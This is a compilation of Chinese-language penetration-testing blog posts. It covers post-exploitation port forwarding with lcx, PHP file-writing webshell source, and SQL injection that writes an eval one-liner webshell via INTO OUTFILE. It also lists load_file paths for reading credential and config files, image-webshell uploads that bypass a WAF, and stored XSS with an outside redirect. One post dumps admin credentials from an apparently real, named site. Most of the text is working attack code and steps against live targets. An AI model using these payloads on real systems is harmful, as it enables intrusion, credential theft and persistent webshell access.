在Getshell后

上传lcx.exe 然后执行

lcx.exe -salve x.x.x.x 3389(外网ip和转发的端口) x.x.x.x 1234(内网ip和远程端口)

 

本机运行

lcx.exe -listen 1234 2000

然后连接127.0.0.1:2000

就可以连接了

<title>Adian自制小马</title>
<form action="" method="post">
<div align="center">本文件路径:<?php echo $_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'];?><br><br>
</div>
<hr align="center" />
<div align="center"><br>
  保存路径:<input name="p" type="text" size="30" maxlength="50"><br><br>
  输入你要保存的内容:<br><br>
  <textarea name="t" cols="60" rows="25"></textarea>
  <br>
  <br><input name="" type="submit" value="写入">
</div>
</form>
<?php
$_path = $_POST['p'];
$_text = $_POST['t'];
$_file =fopen($_path,'w+');
fwrite($_file,$_text);
fclose($_file);
?>

 

一个乐于助人的大牛给了我一个站让我练手

说走咱就走啊,一言不合就开车啊对不对

and 1=2直接报错出了路径,这回我打码了,毕竟站是别人给的

然后order by 26返回正常

order by 27返回错误

于是我们

http://xxxx.com/article.php?wid=xxxx UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

没报错

 

然后在wid=这里加一个-

报错爆出 7 和10

然后开始查询user()

和database()

这时候我看到了了不得的东西

UNION SELECT 1,2,3,4,5,6,database(),version(),9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

root!!!

然后就Happy了

直接UNION SELECT 1,2,3,4,5,6,'<?php eval($_POST[a])?>',version(),9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile 'D:\\xxxxx\\xx.php'

成功getsehll

 

1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)

2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录

4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件

5、c:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf  查看WINDOWS系统apache文件

6、c:/Resin-3.0.14/conf/resin.conf   查看jsp开发的网站 resin文件配置信息.

7、c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机

8、d:\APACHE\Apache2\conf\httpd.conf

9、C:\Program Files\mysql\my.ini

10、../themes/darkblue_orange/layout.inc.php  phpmyadmin 爆路径

11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件

12、 /usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看

13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上

14 、/usr/local/app/apache2/conf/extratpd-vhosts.conf APASHE虚拟主机查看

15、 /etc/sysconfig/iptables 本看防火墙策略

16 、 /usr/local/app/php5 b/php.ini  PHP 的相当设置

17 、/etc/my.cnf  MYSQL的配置文件

18、 /etc/redhat-release   红帽子的系统版本

19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.

21、/usr/local/app/php5 b/php.ini //PHP相关设置

22、/usr/local/app/apache2/conf/extratpd-vhosts.conf //虚拟网站设置

23、c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini

24、c:\windows\my.ini

25、/etc/issue 显示Linux核心的发行版本信息

26、/etc/ftpuser

27、查看LINUX用户下的操作记录文件.bash_history 或 .bash_profile

28、/etc/ssh/ssh_config


/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
/var/log/error.log
/var/log/access_log
/var/log/access.log
/etc/mail/access
/etc/my.cnf
/var/run/utmp
/var/log/wtmp


../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log      
/var/log/httpd/error_log    
../apache/logs/error.log    
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log

通过网站的报错信息

通过传递一些错误参数,比如',"等符号,使网站报错,有些报错会给出绝对路径

通过搜索引擎获取

搜索引擎语法:

site:example.com warning
site:example.com "fatal error"

其实还是找报错信息,因为部分网站做了对报错的处理,所以可能前端传参不容易造成报错

读取网站的配置文件

若存在注入点,可以使用load_file()等函数来读取配置文件获取绝对路径

Windows

配置文件路径
PHP配置文件c:\windows\php.ini    
IIS配置文件c:\windows\system32\inetsrv\MetaBase.xml

Linux:

配置文件路径
php配置文件/etc/php.ini 
php配置文件/etc/httpd/conf.d/php.conf
Apache配置文件/etc/httpd/conf/httpd.conf 
Apache配置文件/usr/local/apache/conf/httpd.conf
Apache配置文件/usr/local/apache2/conf/httpd.conf
虚拟目录配置文件/usr/local/apache/conf/extra/httpd-vhosts.conf 

XAMPP配置文件

配置文件路径
Xampp文件路径(www)C:\xampp\htdocs
httpd.com配置文件C:\xampp\apache\conf/httpd.conf
vhosts.conf虚拟主机C:\xamppapache\onfextra\httpd-vhosts.conf
phpnow配置文件D:\PHPnow-1.5.6\htdocs
httpd.conf配置文件D:\PHPnow-1.5.6\Apache-20\conf\httpd.conf
vhosts.conf虚拟主机D:\PHPnow-1.5.6\Apache-20\conf\extra\vhosts.conf

phpstudy配置文件:

配置文件路径
WWWWC:\phpstudy\www
httpd.conf配置文件C:\phpStudy\Apache\conf\httpd.conf
vhosts.conf虚拟主机C:\phpStudy\Apache\conf\extra\httpd-vhosts.conf

LAMPP配置文件:

配置文件路径
wwwroot/opt/lampp/htdocs
httpd.conf配置文件/opt/lampp/etc/httpd.conf
vhosts.conf虚拟主机/opt/lampp/etc/extra/httpd-vhosts.conf

phpmyadmin爆路径

/phpmyadmin/themes/darkblue_orange/layout.inc.php

本质上还是报错

代码执行漏洞

eval()函数可控的话,直接传入phpinfo(),通过phpinfo页面中Document_Root参数获取网站绝对路径

头一次哈,还是上回那个站

毫无技术含量

我们用以前注入出来的账号密码

因为这次注入,,

会出现这个神奇的东西

 

 

我们用上次注入出来的账号密码登录后台,一切都没有变

然后还是上次的上传点

我尝试了1.asp

结果:无返回

抓包发现是安全狗拦截了

改成1.jpg

发现也拦截了

于是我翻了翻家里面的《白帽子讲web安全》

发现可能是用文件头判断的

于是我自制了一个图片马

如图

在一个正常图片(记事本打开)随意的地方插入一句话

改成jpg格式上传,上传成功

 

然后我们数据库备份

我们直接一句话连接

用过狗刀

因为

 

 

过狗刀下载:http://www.cncaidao.org/

我们直接连接

 

没啥技术含量

我曾经在某个编程吧混迹过一段时间

最近突然去看看

大家居然都已经玩的灰常高端了

于是,一个云储存吸引了我的注意

好高端的样子,不得不为这个界面点赞

这回我全程打码

因为这个作者非常良心

反正灰常牛逼就是了

我在注册账号的时候账号密码全部填写<script>alert("xss")</script>

等到我登录的时候发现执行了

但是我很快发现这并没有什么用

打开个人中心

然后随便上传了个文件

不能上传php哈

但是可以重命名为php文件

想想办法getshell(明天再说)

然后我发现在这个文件重命名处也可以XSS

分享出去后我发现文件名会出现在主页

那么我猜测主页会执行

<script>alert("xss")</script>

是的没错

 

我转念一想

直接执行<script>window.location="http://www.e-wolf.top/a.html";</script>

可好

想了想算了

给站长留句话

走人

突然在瞬间

我看到了

白打码了

不过这下不怕你们乱搞了

 

前言

TTL值判断操作系统是2015年左右的说话,具体科学性未知,仅作为参考,不可作为绝对的判断条件

什么是TTL

TTL(Time To Live,生存时间)是IP协议包中的一个值,当我们使用Ping命令进行网络连通测试或者是测试网速的时候,本地计算机会向目的主机发送数据包,但是有的数据包会因为一些特殊的原因不能正常传送到目的主机,如果没有设置TTL值的话,数据包会一直在网络上面传送,浪费网络资源。数据包在传送的时候至少会经过一个以上的路由器,当数据包经过一个路由器的时候,TTL就会自动减1,如果减到0了还是没有传送到目的主机,那么这个数据包就会自动丢失,这时路由器会发送一个ICMP报文给最初的发送者。举个例子,如果一个主机的TTL是64,那么当它经过64个路由器后还没有将数据包发送到目的主机的话,那么这个数据包就会自动丢弃。

TTL值与主机对照表

仅作为参考,具体操作系统还需要经过验证

操作系统TTL
Linux64
Windows 2000/NT128
Windows32
unix255
WIN764

学渗透一年多了,看过的教程没有10套也有8套,不过都是些被翻拍的垃圾教程(除了明小子就是啊D)直到我看完了小迪哥发的免费教程,我才意识到,这才叫学习资料,我想开个博客,求推荐一个速度快的免费空间撒

废话不多说

目标站http://www.fuhouxiang.com(大家请合理练手)

看到这个站,我们随便打开一个连接看看

http://www.fuhouxiang.com/NewsView.asp?ID=312

根据迪哥的方法,直接在参数后面随便输入字符提交,如果报错说明他接收并执行了你加的参数,所以存在注入

看来是存在注入

用order判断下字段数

order by 12返回正常

order by 13返回错误所以我们使用一下语句

http://www.fuhouxiang.com/NewsView.asp?ID=312 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 from admin

得到

 

然后将2换为username 7换为password

http://www.fuhouxiang.com/NewsView.asp?ID=312 UNION SELECT 1,username,3,4,5,6,password,8,9,10,11,12 from admin

得到

username 和password都是lyqlkj

注入出账号密码了,妈的死活扫描不到后台地址,御剑加大字典也找不到

但是我灵机一动

robots.txt

很好,成功的引起了我的注意

然后进入后台找到添加产品,额,直接上传asp居然不带过滤的